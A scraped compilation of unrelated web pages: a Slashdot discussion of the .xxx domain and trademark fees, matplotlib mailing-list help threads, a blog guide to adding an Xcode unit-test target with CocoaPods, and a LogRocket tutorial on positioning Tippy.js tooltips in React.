?" Welcome to capitalism (Score:2, Insightful) We hope you enjoy your stay. Re:Welcome to capitalism (Score:5, Interesting) No, it's more like, "Welcome to Florida". The level of corruption in this state is unbelievable. Lawyers mismanaging senior citizen trust funds is rampant in Florida, and there's absolutely nothing that family members can do about it. Any time a lawyer gets a hold of a senior citizens' funds because that person is incapacitated, the lawyer immediately makes up all kinds of bogus legal fees and charges them to the person's account, draining their funds in a matter of months. It's impossible to file a Bar complaint, because that will cause the lawyers to sue the complainant, and the Bar tells that to anyone who calls them to file a complaint about an attorney. This kind of corruption is nothing new in the USA, but it's raised to an absurd level in Florida. Apparently, a lot of people are so mad about it that they're going to stage an event where they fly planes with banners protesting the state of affairs over the county court houses all across the state, at the same time. Re:Welcome to capitalism (Score:5, Interesting). Re: (Score:3). Plenty of lawyers would sue their own children or parents if there was any chance of getting money out of it, I don't think they'd balk at diddling a fellow shark. Gerber.xxx? (Score:5, Funny) Re: (Score:2, Insightful) Re: (Score:2) Not nearly enough money there to offset the loss of business from social conservatives boycotting Gerber. Which is why the lawsuit damage amount will be staggering. Same with disney.xxx. These companies can bring millions of dollars in legal muscle to bear when it comes to protecting their names and IP. Just the 'goodwill' & defamation of company character amounts will be huge. In other news (Score:4, Insightful) Re: (Score:3) Re: (Score:3) The problem with that is it favours companies with lots of money and IT staff who can keep on top of it. It isn't just generic TLDs they have to worry about, there are all the country TLDs too. There is no good solution. Companies will always want to buy every variation of their name. The best we can do is ensure that name-is-stupid.com is protected if registered by an individual, but at the moment it all depends on the local trademark laws. It is worse for non-US companies because the supposedly generic TLD Re: (Score:2) So, clearly, what we need here is a .stupid TLD. Then we can get all the stupid companies to take .stupid domain names, and the clever ones can stay as they are. That should work exactly as well as the .xxx TLD is going to work. Of course it all falls apart if someone is clever enough to take the "is-stupid" suffix and register it under .xxx, or indeed .stupid. No publicity is bad publicity (Score:2) After all, what maker of baby food or children's movies, for example, would want to have sites such as gerber.xxx or disney.xxx floating around the Internet? They could spin it advantageously in the end...somehow. Re: (Score:2) By making it a porn site themselves, ala PETA and reap the profits. After all it promotes ... baby nutrition. Re: (Score:2) PETA was not well-looked-on by the courts. Imagine how this company will be considered. His is this any different from other TLDs? (Score:5, Insightful) I don't see how this is any different than worryabout trademark registrations for .edu, .net, .org, or the country code TLDs. If you really want to protect your trademark, you have to register an awful lot of TLDs just to cover one variation on a name. 
Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other .TLDs. Re:His is this any different from other TLDs? (Score:5, Insightful) Re: (Score:2) Re: (Score:3) >>Just a pure shakedown. If only the ICANN had done a request for comments from the public, maybe these problems could have been identified in advance. Oh, wait, they did. It was a terrible idea then, and a terrible idea now, which got rejected repeatedly, until a bunch of money got dangled in front of their face. Re:His is this any different from other TLDs? (Score:5, Insightful) It's similar in a way, and they already have been trying to push that (all the registrars nag, sometimes insistently, about registering variants). At first glance this raises the stakes by putting forth the possibility of someone not only squatting on a variant of your name, but an "unsavory" version of it. disney.info is squatting, but disney.xxx maybe would damage the brand. Like if there were a .felon domain name and someone registered your full name dot felon or something. On the other hand, it's long been possible to convert a non-offensive domain name into an offensive domain-squat by just putting up unsavory content on the domain, like in the ol' whitehouse.gov/whitehouse.com thing. Re: (Score:3) Re:His is this any different from other TLDs? (Score:5, Interesting). Re:His is this any different from other TLDs? (Score:5, Insightful) Easy answer. A domain squatter is someone who owns a domain and doesn't have nearly as much money as the person who wants it. Re:His is this any different from other TLDs? (Score:5, Insightful) Exactly. Remember mikerowesoft.com? The guy's name was Mike Rowe, and he had a software company. He had every right to that domain name and company name, but Microsoft forced him to give it up. Re: (Score:2) I like you. This is my point as well. Maybe I slept that day in marketing class, but how does the public really distinguish the brand trust between disney.xxx and disneyxxx.com? It's going to take a while before the average joe thinks "whatever.xxx" is actually a website. Google is going to be doing most of the work for the first year, as people search "whatever xxx" and end up at ://whatever.xxx/ first click.. You win devil's advocate points, but are still morally bankrupt. ;) The idea of a "legitimate porno Re: (Score:2) Re: (Score:3) Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other Also fortunately, very few people would actually care if gerber.xxx was a porn site. For a long time whitehouse.com was a porn site. Was good for a laugh, but it wasn't like people were outraged thinking that Bush or Clinton or whoever was in the office at the time was filming all those lesbo scenes. How many people are going to type in gerber.xxx, get porn or viruses, and stop buying baby food? Re: (Score:2) Re: (Score:2) The porn site would be a LIE! I didn't get hot lesbian sex... I got BABIES... now those Gerber folks got me for the next 3+ years. It's some kind of ensnarement to get more business. (although Gerber should go after the 65+ crowd..it's bigger than the under 5 club. Gotta gum day food.) Re: (Score:3) its no different, just an extension of the same scam. I still remember when the top level names actually meant something.. ( and i think was enforced, or at least it seemed to be back then ) Someone like Microsoft wouldn't be allowed to register a .org, or .net.. 
Now its a free for all, and forcing companies to take preemptive steps and forking out the cash. ( for a large company its not a lot of cash, but its still wrong.. and for a smaller company it can add up. ) The entire name system is a total disaster Re: (Score:2) Re: (Score:3) If you really want to protect your trademark, you have to register an awful lot of TLDs just to cover one variation on a name. That's really a silly approach to trying to protect your trademark -- even with the top-level domains currently out there, there are just too many variations. Why is disney.xxx a big deal when they haven't registered disneyxxx.com or disney-xxx.com? If disney.xxx pops up, then Disney can file a UDRP complaint or a civil suit and get the domain taken down pretty quickly. Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other .TLDs. That is certainly not true. Registering the .com does not give you rights to any others. Its already agaisnt the law (Score:2) Re: (Score:2, Interesting) against the law where ? there are 192 countries on this planet Re: (Score:2) Why would Disney.xxx be against the law? No child is accidentally going to go to Disney.xxx when they think they're going to Disney.com. They're going to have a little link on their bookmark bar to Disney.com. They would have to actually try if they wanted to get to Disney.xxx. And further, there's no possibility that a porn site would ever get confused with Disney, the children's programming company. No confusion, no trademark infringement. About the only thing that might make it dubious is the "famo Re: (Score:2) ...I question that trademarks are as strong as you think they are. If the registry for .xxx is based in Florida (the same state as several major Disney parks), I guarantee you that their trademark is much, much stronger than you think it is. Re: (Score:2) Not necessarily. By including .xxx in the domain, they are explicitly (pun intended) conveying that they are NOT a site for children. Further, they are making it quite simple for a responsible parent to block their child's access to their content. If the domain was picturesofdisney.com and "Disney" turned out to be a stripper, you'd have a point. This has already been discussed (Score:3, Informative) Re:This has already been discussed (Score:5, Insightful) A couple hundred bucks so something bad does not happen to you (wink wink) is a shakedown, regardless of how much money the shakee has. Re:This has already been discussed (Score:5, Insightful)". Re: (Score:2) There is no renewal. The $200 fee (if your application is approved) results in a permanent, irrevocable, blacklist of that name. Even YOU cannot use the .xxx name if you successfully get it blacklisted. Re: (Score:2) While that's marginally than having to renew every year, it's still a $200 fee (plus accounting costs and the time to file the paperwork) that they don't have to pay now. And they'll face the same issue with each new gTLD. Still looks a lot like a protection racket. And taking it permanently out of use might make sense for some brands/trademarks, but for others, that could be a problem. If the company who owns a trademark goes out of business, or stops using it and eventually stops renewing the trademark whe Re: (Score:2)". The solution is arbitrary, non-exclusive, TLDs. If there is a (potentially) infinite number of TLDs then these land-grabs and protection rackets become impossible. 
Just like how, the .com namespace right now, you cannot defensively buy every variation of insult couple with your brand. You might grab mybrand-sucks.com, and boycott-mybrand.com, but you miss mybrands-mother-was-a-hamster.com and all the rest. You wait and reactively fight these kinds of things with court injunctions when they become troublesome Re: (Score:2) Re: (Score:2) Ok, ill give you that on the huge companies out there, but what about a mom and pop shop that barley makes a living selling their home made widgets? Why should they have to defend themselves, in effect? $200 for .xxx $200 for .net, info, biz, bla bla bla.... ( and the time spent maintaining it all ) It does add up after a while. Never forget who OWNS the Washington Times. (Score:2) That paper is about as serious as the Daily News. Submissions linking to it have no place here. Re: (Score:2) All publications should be submitted here. Regardless of who "owns" a paper or not. Leave it to the reader, and commenters on the forums to decide. Not your narrow view of what people should decide. Re:Never forget who OWNS the Washington Times. (Score:4, Informative) I don't know when people started taking the stance that all opinions and all sources should be given equal time and weight, but it has led to a massively uninformed populace. Re: (Score:2) I don't know when people decided that refusing to run a story based on who owns a news paper was a good way to do things. You know they did that just before germany turned into nazi germany too. That turned out well. Re: (Score:2) Nice to see Godwin is alive and well. Re: (Score:2) Nice to see Godwin is alive and well. Is he living in Argentina? Re: (Score:2) [wikipedia.org] Re: (Score:2) Well, it certainly is better when one group gets to decide what is "informative", right? Gerber? (Score:2) gerber are obviously just typosquatting gerbil.xxx, a domain which I expect to retail for plenty. Worst of both worlds? (Score:4, Insightful). Exorbitant registration fees will make it so this will never serve its intended purpose- most smut will be hosted on normal tlds just to save on fees. And the claimed "shakedown" racket makes no sense. If there's going to be porn which (ab)uses your trademark, it's not like registering a domain will wipe it out or even make it significantly harder to find. The best route for normal businesses would be to just ignore everything under that tld. It's not like the old whitehouse.com problem- if somebody says "I went to gerber.xxx and was SHOCKED to see what was there! For shame!" there's the easy rejoinder "What exactly were you doing looking up gerber.xxx, and what did you expect to find on an .xxx domain? Why would you think that's affiliated with us at all?" But this greedy registry wants to wring extra dough out of people by playing on their trademark paranoias. Re:Worst of both worlds? (Score:5, Informative). The trouble is that it can't work that way. You can't exclude all smut to a single set of domains for a large number of reasons. For one thing, nobody really agrees on a definition. For another, any single domain may contain a wide variety of things: You can find a metric ton of non-smut on tumblr, but you can also find plenty of naked women there too. 
And you basically end up with two choices: Either you banish all of those websites in their entirety to .xxx and then all of their non-smut content ends up behind the filter (and you hit First Amendment problems in the US), or you let websites containing smut use non-.xxx domains, but then the filter doesn't actually block the smut because nobody uses exclusively .xxx when they can reach a larger audience by paying another $8/year to get the equivalent .com domain. The problem is really with filtering in general, not with domains: You have a trade-off between false negatives and false positives. The only way to have a low number of false negatives is to have a high number of false positives and vice versa. And we decided a long time ago that it's better for government to accept the large number of false negatives and then let people choose for themselves what content they want to consume, than to have a government censorship board that decides what people can see and hear. Re: (Score:2) Isnt this a rather good place for TXT records? img.tumbler.com TXT contains:unfiltered-images,usercontent Worked for SPF, and would certainly get the job done easily. Let sites classify themselves, and have registrars enforce it. As for first amendment rights, as long as it is not being legislated or pushed into place by the government, what your employer filters is not a violation of your rights at all. Re: (Score:2) Isnt this a rather good place for TXT records? img.tumbler.com TXT contains:unfiltered-images,usercontent The trouble is that the tags don't tell you enough. Every website in the world has user content these days. If you block anything that approximately means "unmoderated user content" then you block everything from Slashdot to vendors' tech support forums to Google web search. But if you don't then you let through all the "explicit" content posted by users. As for first amendment rights, as long as it is not being legislated or pushed into place by the government, what your employer filters is not a violation of your rights at all. The only way the smut peddlers would actually register their content as smut is if the law required it; they know it means their site will be blocked and t Re: (Score:2) The disagreement about the definition of smut is exaggerated: just about everybody "knows it when they see it," to quote Judge Stewart, for the vast majority of cases. To pretend there's vast disagreement about it is just disingenuous. Sure, there's a bit of disagreement at the margins, and of course saying that a whole domain has to move to .xxx because of a pornographic image or two would be ludicrous. But I'm not talking about implementing a zero-false-negatives filter, especially not at a government leve Re: (Score:2) The disagreement about the definition of smut is exaggerated: just about everybody "knows it when they see it," to quote Judge Stewart, for the vast majority of cases. To pretend there's vast disagreement about it is just disingenuous. The problem, as always, is that "knows it when they see it" is not a meaningful legal test. Is a picture of a topless girl smut? What about a video showing two people having sex, but without showing any nudity? What if the same scene is three minutes long out of a 60 minute drama? What if it's three minutes out of 60, but the sex scene does show nudity? 
What if there is no sex or nudity at all, but a scene shows a woman striking another woman with a whip and presents the implication that she takes pleasure Re: (Score:2) ...But this greedy registry wants to wring extra dough out of people by playing on their trademark paranoias. But if I don't register my-trademark.xxx, then it could be claimed in court that I wasn't protecting my trademark, and thus it should be vacated... :( You know, I started this post off as a joke, but unfortunately, I suspect that someone could actually succeed at this claim... FSM, we need better trademark laws... :( Re:Worst of both worlds? (Score:4, Insightful) Re: (Score:2) Re: (Score:2) Re: (Score:2) I agree about Facebook belonging there! Streisand Effect (Score:2) I continue to wonder whether any greedy porn king would have the slightest interest in "gerber" or "disney". If they had found a market in that, we'd already have Gerber_XXX.com or XDisney (like Xhamster). The brew-ha-ha may actually create a "Streisand Effect" causing domain squatters to go register domains they otherwise would not have considered (something I tried labelling the "streisand.xxx effect"). "The Streisand effect is a primarily online phenomenon in which an attempt to hide or remove a piece Re: (Score:2) Which makes me also wonder... what's the big problem here? In the article, the only people complaining are the smut site operators because they don't like the idea of shelling out more of their "hard" - earned money on protecting their brands. As for other businesses, they really don't seem to have anything to worry about. If every Joe's Widgets Inc. had to worry about every TLD, they'd have to register over a hundred of them. Most people use a search engine to find what they're looking for. When they DO kno simple domain registration rules? (Score:3) ICANN should make a few simple rules (i.e. easy to understand and to code). Good examples could be {domain}.com OR {domain}.xxx, but not both {domain}.TLD (original list) OR {domain}.(arbitrary TLD), but not both. These could be used to filter out online registrations. Obviously some sort of exceptions will crop up (playboy.com and playboy.xxx), which could be handled by certifying that the owner of the first registration is filing for the second. Registrars could charge extra for this manual red-tape exception. The whole TLD industry is a scam anyway (Score:2) Fifteen years ago, .org, .net and .com made sense and by and large companies registered the domain that made sense for their business. Then businesses decided that letting someone else own, say, cocacola.net didn't make a lot of sense from a branding point of view. (Which is entirely true; the domain system was devised with little thought given to commercial interests or how they'd likely play out). Today, most businesses of any size can be counted on to register every TLD that is even remotely well-known - i Re: (Score:2) Re: (Score:2) Wow, they did it! (Score:2) I have a lot of "smut" like domains. I would say, I own about 50 non-variant domain names; non-variant bob.com and bobby.com count as one. Maybe a solid 35 of those are no doubt fine domains for a smut site. All for personal use, because I'm a geek and feel I ought to own my own domains, I do not make money from them or anything, I don't even check the mail going to many of them so even if someone wanted to buy one for millions I never saw the offer, nor do I want to see such an offer honestly. 
To me, i what is all the fuss about (Score:2) Re: (Score:2) Are you sure you actually know anybody? Re: (Score:3) I truly doubt that none of your acquaintances or any of their acquaintances watches porn. It's not as if not knowing they watch it means no one does it. Do you have some sort of neighborhood porn investigation network in which you and your buddies talk about their abstinence from porn or something? Enforcement? (Score:2) They rarely enforce the intended uses of the existing TLDs. Did you really think .xxx would be any different? Re: (Score:2) They rarely enforce the intended uses of the existing TLDs. I guess you haven't tried to get a .bank or .aero domain name. Re: (Score:3) Keyword is rarely. Some TLDs are enforced. mil, edu, etc No surprise (Score:2) Anyone who is surprised by this has simply not been paying attention. confusion (Score:2) Hey, Gerber does not get to monopolize the name! (Score:5, Interesting) Gerber means "to vomit" in french. Since .xxx is not language specific and vomit has a small but very dedicated and well-paying porn following (really, it does), I have every right to register that name and use it to sell vomit-porn to the francophone market. As long as I am not using the name in a way that would lead to trademark confusion (which would be pretty hard to argue), Gerber should just butt out. Re: (Score:2) Re: (Score:2) Except other, more reputable, agencies handling domains always give trademark holders and current domain holders first dubs on names before allowing others in. It seems they are already to the "bidding" stage with no mechanism to allow current rights holders to protect their rights... The registrar should be sued outright for not putting methods in place every other registrar agreed to after years of lawsuits. Re: (Score:2) the concept of 'vomit-porn' is not only new to me, but horizon-widening in every sense ... No, the horizon-widening porn is called scat. Don't google it! Re:Hey, Gerber does not get to monopolize the name (Score:4, Funny) Alt.sex.watersports never involved synchronized swimming, either. -- BMO Re: (Score:2) You haven't heard of '2 girls 1 cup' ? Re:Disney.xxx ? isnt there already such a site ? (Score:5, Insightful) Re: (Score:3) Not to mention power over copyright. Re: (Score:2) as a parent, i'm going to be watching what my kid watches. and try to limit the amount of TV they watch in the first place. if you let TV raise your kids, then you reap what you sow. and Disney's nowhere near as bad as most of the shit that gets broadcast. i may backflip when my kid gets old enough to nag me for stuff. Hollywood Records (Score:2) I figure that Disney's Hollywood Records subsidiary is a problem, any issues with the message of classic Disney cartoons nonwithstanding. Hollywood Records is responsible for especially crappy pop music (Miley Cyrus, Hillary Duff, the Jonas Brothers) that pushes an eerily clean-cut image Re: (Score:2) Re: (Score:2) Hmmm... lessee... Server not found Firefox can't find the server at. Apparently not... yet. Re: (Score:2) I'm not an animal-rights activist, but to say that animals have no feelings and do not feel pain? There is quite a bit of scientific evidence for that, and little against it, at least when it comes to mammals. Whether they feel it the exactly the same as we do is irrelevant. You need to brush up a bit. Re: (Score:3) Anyone who thinks animals don't have feelings or the ability to perceive pain either haven't spent enough time with animals, are terrified of them, or have autism. Seriously. 
Have you never stepped on a cat's tail? Not only will it react in pain - much as a human would if you stepped on them - it will likely hold it against you. Dogs are practically ruled by their emotions. In fact, us humans borrow their reactions to describe emotions - one who is beaten walks away with their tail between their legs. My bu Re: (Score:2) it's impossible to know another person's pain, let alone another being. it's just a call that no real scientist is willing to make on anything that has the capacity to react at all to it's environment. T-800: "I sense injuries. The data could be called pain." Re: (Score:2) Re: (Score:2) 31 minutes since my last comment? I hope I am not overwhelming the infrastructure here! The Slashdot administrators are just doing their part to cure those who suffer from Premature Edification. Considering your career (Score:2) 31 minutes since my last comment? I hope I am not overwhelming the infrastructure here! How often do you use this line? :) -Matt Re: (Score:2) Probably because you have a brand new account. Post for a little while, and the restriction should go away. Standard restriction is about 30 seconds or so, and that's just to prevent a lot of "me too!" posts. Re: (Score:2) Five minutes, actually. Re: (Score:2) The closest thing I've ever seen to American hentai is Marge Simpson in Playboy. Not to besmirch Heavy Metal, Ralph Bakshi, and Robert Crumb (bless 'em as pioneers), but we're doing it wrong... Polish Playboy did a CGI photo spread of the women of the Witcher. They looked real in a born-airbrushed sort of way.
http://tech.slashdot.org/story/11/09/05/2014224/Porn-Industry-Outsiders-Fear-Shakedown-In-XXX-TLD
Wed, Mar 2, 2011 at 8:46 AM, Yuri D'Elia <wavexx@...> wrote: > > > > On Wed, 2 Mar 2011 22:01:02 +0900 > Jae-Joon Lee <lee.j.joon@...> wrote: > > > >> > Is this a bug? > > >> > > >> Unfortunately, bbox_inches option is never meant to be complete in > > >> figuring out the exact size of the figure area. > > > > > > Why not? What's the purpose of bbox_inches='tight' otherwise? > > > > Figuring out enclosing bbox when arbitrary spline paths are involved > > is difficult (I think there is no exact solution). So I only intended > > to support common cases. > > Ok, I can understand that, but shouldn't all artists used to construct the > picture, as suptitle, be considered? > > > >> However, you can use "bbox_extra_artists" keyword argument to specify > > >> additional artists that should be considered when dertermining the > > >> plot size. > > >> > > >> mytitle = fig.suptitle("Horray!", fontsize=20) > > >> > > >> ... > > >> > > >> fig.savefig("out.png", bbox_inches='tight', > bbox_extra_artists=[mytitle]) > > > > > > That doesn't work for me either. > > > > Can you be more specific? Does it throw an exception? Or the code runs > > without any error but the output is still wrong? > > No error/exception are produced. The output is simply identical to the one > without bbox_extra_artists. > > This also works in my previous example: > > import matplotlib as mpl > import matplotlib.figure > import matplotlib.backends.backend_agg > > fig = mpl.figure.Figure() > cvs = mpl.backends.backend_agg.FigureCanvasAgg(fig) > fig.set_size_inches((20,20)) > plot = fig.add_subplot(111) > plot.set_title("Subtitle") > plot.plot([1,2,3], [3,2,1]) > st = fig.suptitle("Horray!", fontsize=20) > fig.savefig("out.png", bbox_inches='tight', bbox_extra_artists=[st]) > > Which version of matplotlib are you using? This example works for me using the latest matplotlib from source. Also, why the awkward usage and imports? If you want to force the Agg backend to be used, you could just do: import matplotlib matplotlib.use("Agg") before any other matplotlib imports. Ben Root On Thu, Mar 3, 2011 at 9:54 PM, George Washington <gws293@...>wrote: > I am new to Matplotlib and am having some problems plotting the following > set of coordinates (in python 2.6 and Win 7 32) > This is just a small sample of the data: > > Seq.No. x-scale y-scale z-scale > 01.000000 1579446.055280 5361974.495490 1342.967407 > 02.000000 1579446.646620 5361972.813700 1342.967407 > 03.000000 1579448.047050 5361968.830880 1341.237305 > 04.000000 1579450.992084 5361963.830880 1337.739502 > 05.000000 1579453.937117 5361958.830880 1336.262817 > ... > ... > > with the following outcome: > (plot3d.png) > > *Problem*: while the x-scale is ok and the z-scale looks ok, the y-scale > is definitely not ok. The numbers in the image are *not* the ones in the > y-array (I double checked.) > George, This is a known issue where very large axis values were being represented using an "offset" (much like in 2-d plots with very large axis values). The problem was that the offset was not displayed for 3d plots. This is definitely fixed in the latest development branch, but I can't remember if I fixed it in the 1.0.1 release (probably not). > > I also have a number of questons: > *Question1*: how does one create a label for the z scale? (zlabel is not > valid) > This should be fixed by the next release. Most functions like set_xlim(), set_ylabel() and such merely call that function for the appropriate axis object. 
If a particular function is missing, you can call it yourself doing something like the following: ax.zaxis.set_label() Note that if you have an earlier version of matplotlib, you might have to do: ax.w_zaxis.set_label() > *Queston2*: Is it possible to fill below the line (so it looks like a > mountain) and how > Never tried considered anything like that. Might involve creating a 3D patch object with some sort of path completion. File a feature request on the matplotlib tracker here: > *Question3*: Is it possible to traverse sequentially all the points > plotted in the image so as to make computations (such as distance to the > next point, etc..). > The points themselves come from a text file but are not > in sequence. They are sequenced by being plotted in their right position in > 3D space. > > I am not exactly sure what you mean, but there is a nice data structure that I use to do efficient data operations on spatial data called KDTrees, which can be found in scipy: I hope that is helpful. Ben Root Thank you for the reply. I discovered this myself yesterday. Now I have an official answer if people want a colored + or the x symbol in the scatter plot. Scott Hansen efiring wrote: > >. >> >> > > > ------------------------------------------------------------------------------ > What You Don't Know About Data Connectivity CAN Hurt You > This paper provides an overview of data connectivity, details > its effect on application quality, and explores various alternative > solutions. > _______________________________________________ > Matplotlib-users mailing list > Matplotlib-users@... > > > -- View this message in context: Sent from the matplotlib - users mailing list archive at Nabble.com.. > > On 03/01/2011 10:22 PM, Jason Grout wrote: > I tried building the standalone html docs using: > > cd doc > python make.py html > > I notice that there are around 30 .pyc files left in the > build/html/pyplots/ directory. Are these needed in the html > documentation build directory? > No -- but they are also a little hard to avoid. I have made a change to clean these out after the fact. > Also, it seems that the files in _images are redundant, as they are > referenced in their original directory, not _images. > > from the build/html directory: > > % find . -name multiline.pdf > ./_images/multiline.pdf > ./plot_directive/mpl_examples/pylab_examples/multiline.pdf > % grep -ri "multiline.pdf" * > examples/pylab_examples/multiline.html:<p>[<a class="reference external" >source > code</a>,<a class="reference external" >hires.png</a>, > <a class="reference external" >pdf</a>]</p> > This one is harder. Sphinx annoyingly always copies every image that is displayed on a page to the _images directory. However, it is impossible to link (i.e. through an <a href="...">) to an image in the _images directory. Since our plot directive results need to both display the image and link to different resolutions of them, we have to at least have two copies of the "normal resolution" pngs, unless we can solve the problem in Sphinx itself or do some sort of postprocessing on the HTML output. However, the .pdf files ending up in _images is the result of the peculiar way in which HTML and LaTeX are generated from the same source. Sphinx seems to think it is displaying both png and pdf images in the HTML and copies them both over. I have added a post-processing step to our build that subsequently removes the pdf files under _images. 
You can see the changes here: Mike > Any comments about trimming down the size of the build/html directory? > > Thanks, > > Jason -- Michael Droettboom Science Software Branch Space Telescope Science Institute Baltimore,
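For anyone who wants to replicate that cleanup in their own docs build, a rough sketch of such a post-processing pass might look like the following (the paths match the thread's build/html layout, but this is my own illustration, not Mike's actual commit):

    import os

    build_dir = "build/html"  # assumed location of the Sphinx HTML output

    for root, dirs, files in os.walk(build_dir):
        for name in files:
            path = os.path.join(root, name)
            # stray byte-compiled files left behind by the plot directive
            if name.endswith(".pyc"):
                os.remove(path)
            # redundant PDFs that Sphinx copied into _images alongside the PNGs
            elif name.endswith(".pdf") and os.path.basename(root) == "_images":
                os.remove(path)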
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=201103&viewday=4
Adding Test target to an existing project in Xcode
February 16, 2016

I had a project for which it was time to add Unit Tests. Since the project was originally created without any test target, I thought that it was going to be a piece of cake. I had never been so wrong before. In the end I spent 6 hours battling with errors that I was getting due to Cocoapods dependencies, but I finally made it work. So here is a simple step-by-step guide that I think will be very useful for people who are going down the same path.

Adding the Test bundle itself

First of all, just add a new target via File > New > Target... and select iOS Unit Testing Bundle. Done.

In case you mix Swift with Objective-C

To make everything work together, you need a Bridging-Header.h file, which you very likely have already created. But to make it work with the Test Bundle you need to take one extra step, otherwise you will get funny errors: go to the Test Bundle target in your Project > MyAppNameTests > Build Settings > Objective-C Bridging Header and paste the same value you used in your main app target.

In case you use Cocoapods

Next, I had Cocoapods and it was giving me a hard time, but luckily I found a way to calm it down - you need to edit your Podfile and add this line:

    link_with 'MyAppNameTests'

The way Cocoapods works, you have to provide this line, which says that you want to link the Pods framework with your Test Bundle target as well, to get access to all those pods you have in there. Otherwise it just won't work.

Configuring the Test Bundle

Now that we are done configuring our Cocoapods and Bridging Header, we need to actually configure the test bundle itself. All you need to do is:

- Click the Build Settings tab and set the Bundle Loader setting to this: $(BUILT_PRODUCTS_DIR)/MyExistingApp.app/MyExistingApp
- Set the Test Host build setting to this: $(BUNDLE_LOADER)
- Go back to the app target (not the test target) and set the Symbols Hidden by Default build setting to this: NO

Access to your classes from the Test target

Since Swift 2 we have a super easy way to get access to all your classes, structs and other stuff with the new @testable import:

    import XCTest
    @testable import MyAppName

    final class MyFirstTest: XCTestCase {
        override func setUp() {
            super.setUp()
        }

        override func tearDown() {
            super.tearDown()
        }

        func testExample() {
        }
    }

Aaaaaand you are done and you have just saved yourself a couple of hours of your precious life.
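For reference, a Podfile matching the setup described above might look roughly like this (a sketch only: it uses the pre-1.0 CocoaPods link_with syntax the post relies on, which was later removed in CocoaPods 1.0 in favour of per-target blocks, and the pod name is a placeholder):

    platform :ios, '9.0'

    # link the Pods framework with the test bundle as well as the app target
    link_with 'MyAppName', 'MyAppNameTests'

    pod 'SomePod'  # hypothetical dependency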
http://arsenkin.com/Adding-Test-target-to-an-existing-project-in-Xcode.html
A tooltip is a textbox that appears while your cursor hovers over an element in an application and is useful for displaying additional information that a user may need. Tippy.js is a lightweight, easy-to-use library that provides tooltip solutions, as well as other pop-out style GUI tools. Tippyjs-react is a component of the Tippy library that allows developers to integrate tooltips, popovers, dropdown menus, and other elements in React projects. This tutorial will show you how to create and position tooltips in a React project using Tippy.

Prerequisites

First, make sure you install React 16.8+, Node.js, and either npm or Yarn before getting started. To make the most out of this guide, we recommend that you have some familiarity with:

- JavaScript
- HTML
- React
- Programming concepts like functions, objects, arrays, and classes

Getting started

Install tippyjs-react by running one of the following commands from the command line:

    npm i @tippyjs/react
    # OR
    yarn add @tippyjs/react

Open or create a React project with a class and the elements you want to add Tippy tooltips to. For this tutorial, we’ll use a newsletter request form as an example. Specifically, we’ll focus on adding a tooltip to the form’s Submit button.

Adding a Tippy tooltip to a React project

Import the Tippy component and core CSS with the following commands:

    import Tippy from '@tippyjs/react';
    import 'tippy.js/dist/tippy.css';

The tippy.css import statement is optional. It will make the tooltip look polished with little to no additional effort. This is called “Default Tippy.” If you’d rather create and style your own Tippy elements, or “tippies,” from scratch, you can import and use Headless Tippy instead of tippy.css:

    import Tippy from '@tippyjs/react/headless';

Here, we will use Default Tippy with tippy.css to create and position a Tippy React tooltip. After importing the Tippy component, insert a Tippy wrapper around the element you want to add a tooltip to:

    <Tippy content="We'll never share your email with anyone else.">
      <Button variant="outline-success">Submit</Button>
    </Tippy>

These commands will display a Submit button. Whenever a cursor hovers over the button, a tooltip will appear with the text, “We’ll never share your email with anyone else.”

Positioning a Tippy React tooltip

So far, we have not specified where we want to place the Tippy React tooltip relative to our Submit button. When tooltip placement is not specified, Tippy automatically positions them above elements. If an element is at the top of the page and doesn’t have space above it, Tippy will automatically place the tooltip below the element. Our current code will display a page element whose tooltip appears above it. Tippy’s default tooltip placement isn’t always ideal. In most cases, it’s necessary to specify placement to prevent tooltips from covering up important page elements. Tippy makes it easy to reposition tooltips in a React project.
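Putting the pieces so far together, a minimal component might look like the sketch below; the surrounding form markup and the plain button are my own simplification (the article itself uses a react-bootstrap Button), and the placement options discussed next plug into the same wrapper:

    import React from 'react';
    import Tippy from '@tippyjs/react';
    import 'tippy.js/dist/tippy.css';

    function NewsletterForm() {
      return (
        <form>
          <input type="email" placeholder="Email" />
          {/* Tippy needs a child that accepts a ref; a native element works out of the box */}
          <Tippy content="We'll never share your email with anyone else.">
            <button type="submit">Submit</button>
          </Tippy>
        </form>
      );
    }

    export default NewsletterForm;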
Placement options include:

- Top
- Bottom
- Left
- Right

In our example, we want an unobstructed view of the Email field, so let’s move the tooltip to the right of the button element:

    <Tippy placement='right' content="We'll never share your email with anyone else.">
      <Button variant="outline-success">Submit</Button>
    </Tippy>

It’s possible to put multiple tippies on a single element by nesting Tippy commands:

    <Tippy placement='top' content="Top Tooltip">
      <Tippy placement='bottom' content="Bottom Tooltip">
        <Button variant="outline-success">Submit</Button>
      </Tippy>
    </Tippy>

These commands will insert a tooltip that says “Top Tooltip” above the associated element and another tooltip that says “Bottom Tooltip” below the same element. When inserting multiple Tippy wrappers on a single element, be sure to specify different tooltip placements — otherwise, one tooltip will cover all the others for that element.

Other tips and tricks for Tippy tooltips in React

You can add HTML blocks inside Tippy commands to change and stylize the tooltip. For instance, we can add a span tag to change a tooltip’s text color to orange:

    <Tippy placement='right' content={<span style={{color: 'orange'}}>Orange</span>}>
      <Button variant="outline-success">Submit</Button>
    </Tippy>

To remove the little arrow on the edge of the tooltip that points to the element, set the arrow attribute to false:

    <Tippy placement='right' arrow={false} content="We'll never share your email with anyone else.">
      <Button variant="outline-success">Submit</Button>
    </Tippy>

You can also add a delay attribute to the Tippy wrapper, creating a time delay between when the cursor hovers over an element and when the tooltip appears. The delay is measured in milliseconds, so setting the delay attribute to 1000 would lead to a one-second delay.

    <Tippy placement='right' delay={1000} content="We'll never share your email with anyone else.">
      <Button variant="outline-success">Submit</Button>
    </Tippy>

Conclusion

Now you’ve learned the basics of how to create and position Tippy tooltips in a React project, including how to use Tippy’s placement attribute to position a tooltip around an element. You can also add HTML, remove the tooltip’s arrow, or add a time delay in order to customize your tooltips. The project and written code used in this tutorial can be found on GitHub. The complete project used the react-bootstrap framework and the react-router-dom module, but these are not required for the information contained strictly in this article.

Additional resources

To learn more about using Tippy.js with React, check out these excellent resources.

Thank you for this article. Small remark: could you replace “HTML” in the article with the more familiar “JSX” or “a tree of React elements”?

What’s accessibility like with this? Will an on-screen reader trigger the tooltip nicely?
https://blog.logrocket.com/positioning-a-tooltip-in-react-using-tippy/
